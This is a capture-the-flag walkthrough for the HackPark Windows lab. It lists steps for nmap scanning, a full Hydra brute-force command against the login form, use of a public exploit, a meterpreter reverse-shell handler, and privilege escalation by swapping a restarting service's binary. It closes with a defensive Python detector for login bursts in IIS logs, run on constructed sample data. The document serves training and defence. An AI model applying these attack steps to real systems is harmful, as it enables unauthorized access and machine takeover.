HackPark | Nmap, Gobuster, Burp Suite, Hydra, msfconsole, winPEAS

Brute-force a website's login with Hydra, identify and use a public exploit, then escalate your privileges on this Windows machine!

Steps

  1. nmap -sC -sV -Pn <ip>
    • run default scripts and detect service versions; -Pn skips host discovery because it's a known Windows machine and may not answer ping
  2. find the login page
  3. capture the login request with Burp Suite
  4. brute-force the login with Hydra
    • hydra -l admin -P <path to wordlist> <ip> http-post-form "/Account/login.aspx?ReturnURL=/admin:<POST body from Burp Suite>:<failure string>"
  5. log in with the found credentials
  6. check the version number: 3.3.6.0
  7. find an exploit for that version
  8. upload as a file and open the path
  9. generate a reverse shell
  10. upload the reverse shell
  11. in msfconsole, use exploit/multi/handler
  12. set payload to windows/meterpreter/reverse_tcp, then set LHOST and LPORT
  13. run
  14. execute the shell
  15. use winPEAS or a similar tool to enumerate
  16. check running services; find the scheduler
  17. check the scheduler logs; find a service that keeps restarting
  18. replace the restarting service's binary with the shell
  19. wait for the service to restart and catch the shell

Nmap output:

Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
| http-robots.txt: 6 disallowed entries 
| /Account/*.* /search /search.aspx /error404.aspx 
|_/archive /archive.aspx
|_http-title: hackpark | hackpark amusements
3389/tcp open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: HACKPARK
|   NetBIOS_Domain_Name: HACKPARK
|   NetBIOS_Computer_Name: HACKPARK
|   DNS_Domain_Name: hackpark
|   DNS_Computer_Name: hackpark
|   Product_Version: 6.3.9600
|_  System_Time: 2023-11-03T09:11:43+00:00
|_ssl-date: 2023-11-03T09:11:48+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=hackpark
| Not valid before: 2023-11-02T09:04:30
|_Not valid after:  2024-05-03T09:04:30
MAC Address: 02:62:E7:5C:59:F9 (Unknown)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Full Hydra command (POST body captured with Burp Suite):

hydra -l admin -P /usr/share/wordlists/rockyou.txt <ip> http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=3nfN7%2BF8RCiG99qOq9QkfFo%2BEAVVTYwsRkxx3vxt8ZcM6TyowMKFCrPJ1x7kJpybM5VgxB3hr7D677qRfPLN4C%2BoFuTBrZx1XLCHC6%2Fp%2BB24mae7PI0ErZqHGtBZn7DKVGXZmwzQS6m0OyJMcfU0c3XKRvzETT0iEIVCxy8EMPA4cDjf&__EVENTVALIDATION=jfEDqJnAPOcudO3dt1i7Kc0SN4qt62r0kErQo%2BTl5kMHH%2FXc3SX%2FiNkKilqurJYz8ifG6SM57WKhB2aYog%2BOCHREEaTH38isY0%2FAqTORm3rukdekuueb6rwLtfdifUCoHXLlejjcxioGTy3CZXNqy5rIU%2Bv%2BbHYyxOlCZjOcLd8dm%2FJr&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed"
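As an added, defender-side example (not part of the original write-up): the burst of POSTs that Hydra fires at /Account/login.aspx stands out in the IIS W3C logs. The script below parses constructed sample log lines (not captured from the room), then flags any client that sends more than a threshold of login POSTs inside a sliding time window. Treating a 302 right after such a burst as a successful guess is an assumption about ASP.NET forms authentication redirecting on success; the log field names follow the standard IIS #Fields directive.

```python
"""Spot login brute-force bursts against the BlogEngine login page in IIS W3C logs.
Added example for the HackPark notes; sample data below is constructed."""
from collections import defaultdict, deque, Counter
from datetime import datetime, timedelta

LOGIN_PATH = "/account/login.aspx"   # compared case-insensitively, as IIS paths are

# Constructed sample log (not from the room): one legitimate GET, a burst of POSTs
# from one client ending in a 302, and a single POST from an unrelated client.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 8.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2023-11-03 09:11:40 10.10.10.5 GET /Account/login.aspx ReturnURL=/admin 80 - 10.10.14.7 Mozilla/5.0 200 0 0 12
2023-11-03 09:11:41 10.10.10.5 POST /Account/login.aspx ReturnURL=/admin 80 - 10.10.14.7 Mozilla/4.0+(Hydra) 200 0 0 31
2023-11-03 09:11:41 10.10.10.5 POST /Account/login.aspx ReturnURL=/admin 80 - 10.10.14.7 Mozilla/4.0+(Hydra) 200 0 0 29
2023-11-03 09:11:42 10.10.10.5 POST /Account/login.aspx ReturnURL=/admin 80 - 10.10.14.7 Mozilla/4.0+(Hydra) 200 0 0 30
2023-11-03 09:11:42 10.10.10.5 POST /Account/login.aspx ReturnURL=/admin 80 - 10.10.14.7 Mozilla/4.0+(Hydra) 200 0 0 28
2023-11-03 09:11:43 10.10.10.5 POST /Account/login.aspx ReturnURL=/admin 80 - 10.10.14.7 Mozilla/4.0+(Hydra) 200 0 0 33
2023-11-03 09:11:44 10.10.10.5 POST /Account/login.aspx ReturnURL=/admin 80 - 10.10.14.7 Mozilla/4.0+(Hydra) 302 0 0 40
2023-11-03 09:15:02 10.10.10.5 POST /Account/login.aspx ReturnURL=/admin 80 - 10.10.14.9 Mozilla/5.0 200 0 0 35
"""


def parse_iis_log(text):
    """Parse W3C extended log lines, taking column names from the #Fields directive."""
    fields, entries = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()          # IIS writes '+' for spaces, so whitespace split is safe
        if len(values) != len(fields):
            continue                   # malformed line: skip rather than crash
        entry = dict(zip(fields, values))
        entry["ts"] = datetime.strptime(f"{entry['date']} {entry['time']}", "%Y-%m-%d %H:%M:%S")
        entries.append(entry)
    return entries


def find_login_bruteforce(entries, threshold=5, window=timedelta(seconds=60)):
    """Return {client_ip: {"attempts": n, "success_after": bool}} for clients whose
    failed login POSTs reach `threshold` inside any `window`-sized span."""
    recent = defaultdict(deque)        # c-ip -> timestamps of failed POSTs in the window
    failed = Counter()                 # c-ip -> total failed POSTs seen
    flagged = {}
    for e in sorted(entries, key=lambda x: x["ts"]):
        if e["cs-method"] != "POST" or e["cs-uri-stem"].lower() != LOGIN_PATH:
            continue
        ip = e["c-ip"]
        if e["sc-status"] == "302":
            # Assumption: forms auth answers a correct password with a 302 to ReturnURL.
            # A 302 after a flagged burst is the strongest sign the password was guessed.
            if ip in flagged:
                flagged[ip]["success_after"] = True
            continue
        failed[ip] += 1
        q = recent[ip]
        q.append(e["ts"])
        while q and e["ts"] - q[0] > window:
            q.popleft()                # drop attempts that fell out of the window
        if len(q) >= threshold:
            flagged.setdefault(ip, {"success_after": False})
        if ip in flagged:
            flagged[ip]["attempts"] = failed[ip]
    return flagged


if __name__ == "__main__":
    for ip, info in find_login_bruteforce(parse_iis_log(SAMPLE_LOG)).items():
        print(f"{ip}: {info['attempts']} failed logins, success afterwards: {info['success_after']}")
```

On a real server, point the parser at the files under C:\inetpub\logs\LogFiles and tune the threshold and window to normal traffic; the same burst is also the signal an account lockout policy or a login rate limit would cut off.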
Last modified 2023.11.03